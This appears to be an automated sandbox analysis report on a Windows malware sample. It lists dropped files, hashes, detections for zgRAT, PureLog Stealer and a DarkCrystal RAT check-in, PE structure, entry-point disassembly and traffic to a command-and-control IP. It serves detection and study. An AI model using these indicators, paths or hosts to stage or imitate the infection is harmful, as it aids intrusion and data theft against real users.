                                                                                          SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\xEzwJIdo.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):36352
                                                                                          Entropy (8bit):5.668291349855899
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                                          MD5:94DA5073CCC14DCF4766DF6781485937
                                                                                          SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                                          SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                                          SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 21%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\yCaEfIsj.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):39936
                                                                                          Entropy (8bit):5.629584586954759
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                                          MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                                          SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                                          SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                                          SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\zUjwmmDb.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):41472
                                                                                          Entropy (8bit):5.6808219961645605
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                          MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                          SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                          SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                          SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                          C:\Users\user\Desktop\zkTmQnyh.log

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):69632
                                                                                          Entropy (8bit):5.932541123129161
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                          C:\Windows\Vss\Writers\Application\ea1d8f6d871115

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:ASCII text, with very long lines (591), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):591
                                                                                          Entropy (8bit):5.8638878438741795
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:+mVPYh548IES/LwBML7vU9rneHvYhmbR1Uh6d5DRUSxE:+iQQ8IESDDuegKR/bFTxE
                                                                                          MD5:DBA91DD82585D2B7BCEDB739B8FA98C6
                                                                                          SHA1:84390215EE01A0D893D5DB56C0DD854A1870415C
                                                                                          SHA-256:6282EB7F07176E3E71862B30FB6FD36D4E6295A5D8E9AD5E5819604F59978004
                                                                                          SHA-512:08F4D9E7991D1FFF40F1B7BAEB392BB39BB774D77848B2A38A23186307294035134AC5B1D615EC581464DFD4B29E067267CFF1218815837B779F177350FA9A01
                                                                                          Malicious:false
                                                                                          Preview:klldaVyKIpfJ46GHoamK5wtvvb6WmBxkZug6eZ9sH7WeSri5xfSSYmoy1zs8ZchH25uKaKnPb3C7ZPcD3AiHsfLwFrEorATpaPmX7Yfn1D1ejrYlWoFY3ZYWt7EtF8hakXhKnFFff5PporNYSdRC54wA0Po9Uwi3fa4MKO8Rjj28KtsCupamqfeplgUXbGLtWWJNwBOEeAdVCx0GgmPoV6M96Oln4k0dYJlxkePtaWHqCInxpN1y0gXaKJRhakJ3JA73MDgBWgN9yf7xlx8qtBm1vLnaNrS0MOhCLulmrzcUSYloMe6mmdJHXFHAZGypNXxk84m1MW93jRjXj8OtvqNtEZoFmkMkBwH4kBqR2EZPdPiGgtaa2F4gJDfjQgPmJY2wKowiS60qR8Qy0ij2Jvs62kvggHBVzwGEXw5162H5ONOLxqsr6WcYp64j3PCL5e1e1LbEmr5QnxroVjtzYTZdTsYa1V8q069tWuTmPnFOaMu2OPOUgMxmFYKJxAMQtOarx8SlPHkuNKCH7fMmHoKnJXn8jKyObyfLvCEP7mEZmCY4VCLRykJEEwiZUUBFSVTZo1V5a6pejuA

                                                                                          C:\Windows\Vss\Writers\Application\upfc.exe

                                                                                          Download File
                                                                                          Process:C:\ChainbrowserNet\serverDll.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3701760
                                                                                          Entropy (8bit):7.825161826353986
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:i0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8s:i0GbMLx+kcimwRvos
                                                                                          MD5:9F9F04273C02095B1603F3B01EB15D53
                                                                                          SHA1:2CD3B69D15F8B207B0DD5179386DC4DAE28317A0
                                                                                          SHA-256:F75C24A9526340AA88FDA38E4CC95785FF0C95F1781C69C7DC55FC7989E9D7F5
                                                                                          SHA-512:1464983E79C5AB6863821FAC5BA43A926C02236BA52F5042DA9A72BD3BE0CC2AA63FF42404A57FF0533556A97E8366DDB17678052192F94D1BA3A8A9397600E9
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Vss\Writers\Application\upfc.exe, Author: Joe Security
                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Vss\Writers\Application\upfc.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.ug.................t8...........8.. ....8...@.. ........................8...........@.................................P.8.K.....8. .....................8...................................................... ............... ..H............text....r8.. ...t8................. ..`.rsrc... .....8......v8.............@....reloc........8......z8.............@..B..................8.....H...........................-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....8....*....0.......... ........8........E............;...`...t...8....~....(Q... .... .... ....s....~....(U....... ....8.......... ....~....{~...:....& ....8....~....:V... ....8s.......~....(Y...~....(]... ....?*... ....~....{....:=...& ....82...r...ps....z*..(....*

                                                                                          \Device\Null

                                                                                          Download File
                                                                                          Process:C:\Windows\System32\w32tm.exe
                                                                                          File Type:ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):151
                                                                                          Entropy (8bit):4.796351130615274
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:VLV993J+miJWEoJ8FXE+MVXQvT55Vt5y6vpt0Rvj:Vx993DEUMM965r5yu0N
                                                                                          MD5:86F35609ED84FAC0C2DB82ECB48C1E37
                                                                                          SHA1:EC96101E0C2FB93CB39EF284008A4434A3F30254
                                                                                          SHA-256:8BC88C3F412ABC31CDD60B01FE5EC3522EA59DD607E5C8F143A68A42315303DD
                                                                                          SHA-512:B96E68A76DCAA619C3607E23FCA349C76978FC0B766E026C630D7106851AA3A5816D97065389797991955B14DAF25B8F6E8E937AA6D2B628636F0807C52F8307
                                                                                          Malicious:false
                                                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 04/01/2025 06:51:20..06:51:20, error: 0x80072746.06:51:25, error: 0x80072746.

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.781633807575831
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:HMhdtzxEHf.exe
                                                                                          File size:4'000'497 bytes
                                                                                          MD5:bc8116e0b506345bf1de248886a52f86
                                                                                          SHA1:21362fd44f8f157523e4c2616c0c66eb5ba05db0
                                                                                          SHA256:805bb6fbb8749ea5e5d1c0bc61216a96ad6a981d825e13220d34843f8936cd1d
                                                                                          SHA512:e0ffaef37600ecb2556acbad7f34d42b10c447ddcc6cbb25d72502345d6af8891bc070f976e3d47c31eb2070e3882863d49ad1eb1c4566b4ae05aac21ccdb387
                                                                                          SSDEEP:98304:6A0Gk2ZIDQ89P+Siu+K+kcimwvgcKDsD8sH:t0GbMLx+kcimwRvosH
                                                                                          TLSH:D706F116A5924E32D274273545A7423D52A0EB363622FF0B3A5F51927C0BBF18E762F3
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                                                                          File Icon

                                                                                          Icon Hash:f0f2aa29a9f2fc71

                                                                                          Static PE Info

                                                                                          General

                                                                                          Entrypoint:0x41f530
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:5
                                                                                          OS Version Minor:1
                                                                                          File Version Major:5
                                                                                          File Version Minor:1
                                                                                          Subsystem Version Major:5
                                                                                          Subsystem Version Minor:1
                                                                                          Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                                                                          Entrypoint Preview

                                                                                          Instruction
                                                                                          call 00007FB1A0C756EBh
                                                                                          jmp 00007FB1A0C74FFDh
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          push esi
                                                                                          push dword ptr [ebp+08h]
                                                                                          mov esi, ecx
                                                                                          call 00007FB1A0C67E47h
                                                                                          mov dword ptr [esi], 004356D0h
                                                                                          mov eax, esi
                                                                                          pop esi
                                                                                          pop ebp
                                                                                          retn 0004h
                                                                                          and dword ptr [ecx+04h], 00000000h
                                                                                          mov eax, ecx
                                                                                          and dword ptr [ecx+08h], 00000000h
                                                                                          mov dword ptr [ecx+04h], 004356D8h
                                                                                          mov dword ptr [ecx], 004356D0h
                                                                                          ret
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          push esi
                                                                                          mov esi, ecx
                                                                                          lea eax, dword ptr [esi+04h]
                                                                                          mov dword ptr [esi], 004356B8h
                                                                                          push eax
                                                                                          call 00007FB1A0C7848Fh
                                                                                          test byte ptr [ebp+08h], 00000001h
                                                                                          pop ecx
                                                                                          je 00007FB1A0C7518Ch
                                                                                          push 0000000Ch
                                                                                          push esi
                                                                                          call 00007FB1A0C74749h
                                                                                          pop ecx
                                                                                          pop ecx
                                                                                          mov eax, esi
                                                                                          pop esi
                                                                                          pop ebp
                                                                                          retn 0004h
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          sub esp, 0Ch
                                                                                          lea ecx, dword ptr [ebp-0Ch]
                                                                                          call 00007FB1A0C67DC2h
                                                                                          push 0043BEF0h
                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                          push eax
                                                                                          call 00007FB1A0C77F49h
                                                                                          int3
                                                                                          push ebp
                                                                                          mov ebp, esp
                                                                                          sub esp, 0Ch
                                                                                          lea ecx, dword ptr [ebp-0Ch]
                                                                                          call 00007FB1A0C75108h
                                                                                          push 0043C0F4h
                                                                                          lea eax, dword ptr [ebp-0Ch]
                                                                                          push eax
                                                                                          call 00007FB1A0C77F2Ch
                                                                                          int3
                                                                                          jmp 00007FB1A0C799C7h
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          int3
                                                                                          push 00422900h
                                                                                          push dword ptr fs:[00000000h]

                                                                                          Rich Headers

                                                                                          Programming Language:
                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                          • [IMP] VS2008 SP1 build 30729

                                                                                          Data Directories

                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x85d8.rsrc
                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x6d0000x233c.reloc
                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                          Sections

                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                          .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                          .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                          .rsrc0x640000x85d80x8600f33f110be00a39f918462eefc6bb8c66False0.5896105410447762data6.282607140461814IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                          .reloc0x6d0000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                          Resources

                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                          PNG0x645840xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                          PNG0x650cc0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                          RT_ICON0x666780x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.7375886524822695
                                                                                          RT_ICON0x66ae00x1128Device independent bitmap graphic, 32 x 64 x 32, image size 00.5853825136612022
                                                                                          RT_ICON0x67c080x2668Device independent bitmap graphic, 48 x 96 x 32, image size 00.5399715215622457
                                                                                          RT_DIALOG0x6a2700x286dataEnglishUnited States0.5092879256965944
                                                                                          RT_DIALOG0x6a4f80x13adataEnglishUnited States0.60828025477707
                                                                                          RT_DIALOG0x6a6340xecdataEnglishUnited States0.6991525423728814
                                                                                          RT_DIALOG0x6a7200x12edataEnglishUnited States0.5927152317880795
                                                                                          RT_DIALOG0x6a8500x338dataEnglishUnited States0.45145631067961167
                                                                                          RT_DIALOG0x6ab880x252dataEnglishUnited States0.5757575757575758
                                                                                          RT_STRING0x6addc0x1e2dataEnglishUnited States0.3900414937759336
                                                                                          RT_STRING0x6afc00x1ccdataEnglishUnited States0.4282608695652174
                                                                                          RT_STRING0x6b18c0x1b8dataEnglishUnited States0.45681818181818185
                                                                                          RT_STRING0x6b3440x146dataEnglishUnited States0.5153374233128835
                                                                                          RT_STRING0x6b48c0x46cdataEnglishUnited States0.3454063604240283
                                                                                          RT_STRING0x6b8f80x166dataEnglishUnited States0.49162011173184356
                                                                                          RT_STRING0x6ba600x152dataEnglishUnited States0.5059171597633136
                                                                                          RT_STRING0x6bbb40x10adataEnglishUnited States0.49624060150375937
                                                                                          RT_STRING0x6bcc00xbcdataEnglishUnited States0.6329787234042553
                                                                                          RT_STRING0x6bd7c0xd6dataEnglishUnited States0.5747663551401869
                                                                                          RT_GROUP_ICON0x6be540x30data0.8541666666666666
                                                                                          RT_MANIFEST0x6be840x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                                                          Imports

                                                                                          DLLImport
                                                                                          KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                                                          OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                          gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                                                          Possible Origin

                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                          EnglishUnited States

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2025-01-04T11:07:37.094780+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449736104.21.38.8480TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Jan 4, 2025 11:07:36.446886063 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:36.451853037 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:36.451927900 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:36.452708960 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:36.457546949 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:36.811253071 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:36.816195965 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:36.896028996 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:37.094779968 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:37.160557985 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:37.160573006 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:37.160700083 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:37.585690975 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:37.590512037 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:37.679642916 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:37.679955959 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:37.684775114 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:37.816543102 CET4973780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:37.821461916 CET8049737104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:37.821527958 CET4973780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:37.821638107 CET4973780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:37.826426029 CET8049737104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:37.932800055 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.076329947 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:38.090375900 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:38.095182896 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.170082092 CET4973780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:38.175054073 CET8049737104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.175065994 CET8049737104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.175074100 CET8049737104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.184317112 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.184494019 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:38.189379930 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.189464092 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.266511917 CET8049737104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.435678005 CET4973780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:38.494893074 CET8049736104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.533514023 CET8049737104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:38.567673922 CET4973680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:38.623409033 CET4973780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:38.727333069 CET4973880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:38.732150078 CET8049738104.21.38.84192.168.2.4
